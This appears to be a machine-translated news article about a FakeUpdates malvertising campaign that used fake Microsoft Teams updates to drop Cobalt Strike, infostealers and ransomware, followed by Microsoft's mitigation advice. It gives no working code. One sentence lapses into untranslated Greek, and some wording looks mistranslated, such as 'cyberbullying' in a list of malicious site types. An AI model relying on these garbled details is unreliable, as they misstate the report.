Ransomware creators use malicious fake ads for Microsoft Teams updates to infect with backdoors Cobalt Strike systems to endanger the rest of the network.
Ransomware attacks have long targeted organizations in various industries, but the most recent ones have focused on education, which depends on video conferencing solutions due to the limitations of Covid-19.
FakeUpdates attacks appeared in 2019 with the delivery of ransomware DoppelPaymer. But this year, malicious advertising campaigns dropped the WastedLocker ransomware and showed a technical breakthrough.
More recently, hackers exploited the ZeroLogon critical vulnerability (CVE-2020-1472) to gain administrator access to the network. This happened through the context JavaScript SocGholish, που βρέθηκε νωρίτερα φέτος σε δεκάδες παραβιασμένες ιστοσελίδες εφημερίδων που ανήκουν στην ίδια εταιρεία.
Placing malicious fake ads that lure unsuspecting users to do click on it to install an update, it was trapped with injection.
In at least one Microsoft attack, fraudsters targeted Teams software. They shared Teams ads with malicious links. Clicking on the link would download a payload that executed a PowerShell script to retrieve more malicious content.
He also installed a legal copy of Microsoft Teams on the system, so that the victims would not be suspected.
Microsoft says that in many cases the original payload was the Predator the Thief infostealer, which sends the attacker sensitive information such as credentials, browser and payment data. Other malware distributed this way includes the Bladabindi (NJRat) backdoor and the ZLoader stealer.
The malware also downloaded other payloads, with the Cobalt Strike beacons among them, allowing the attacker to discover how it could move sideways on the network.
Microsoft warns that the same patterns seen in FakeUpdates campaigns that use the Teams Update lure have been found in at least six other types of attacks. In some variants of the same attack, the attacker used the IP Logger URL shortening service.
Microsoft recommends using web browsers that can filter and block malicious sites (fraud, cyberbullying, malware, and hosting) along with the use of strong, random passwords for local administrators.
Restricting administrator privileges to key users and avoiding service-wide accounts that have the same rights as an administrator are also on the list of measures that will reduce the impact of an attack.
To minimize risk, Microsoft recommends blocking executable files that do not meet certain criteria, such as age or if they are not on a regularly maintained trusted list.
Blocking JavaScript and VBScript code from downloading executable content also adds important defenses.
